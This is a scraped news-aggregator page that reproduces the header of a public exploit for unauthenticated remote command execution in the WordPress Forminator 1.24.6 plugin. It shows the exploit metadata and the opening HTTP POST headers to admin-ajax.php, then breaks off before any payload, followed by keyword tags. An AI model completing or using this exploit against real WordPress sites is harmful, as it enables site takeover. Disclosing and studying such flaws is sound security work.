Unauthenticated Remote Command News Today : Breaking News, Live Updates & Top Stories | Vimarsana

# Exploit Title: WordPress Plugin Forminator 1.24.6 - Unauthenticated Remote Command Execution# Date: 2023-07-20# Exploit Author: Mehmet Kelepçe# Vendor Homepage: https://wpmudev.com/project/forminator-pro/# Software Link: https://wordpress.org/plugins/forminator/# Version: 1.24.6# Tested on: PHP - Mysql - Apache2 - Windows 11HTTP Request and vulnerable parameter: -POST /3/wordpress/wp-admin/admin-ajax.php HTTP/1.1Host: localhostContent-Length: 1756sec-ch-ua:Accept: / Content-Type: multipart/form-data;boundary= WebKitFormBoundaryTmsFfkbegmAjomneX-Requested-With: XMLHttpRequestsec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64)AppleWebKit/537.36 (KHTML,

Software linkExploit titleWordpress plugin forminatorUnauthenticated remote commandExploit authorMehmet kelepVendor homepage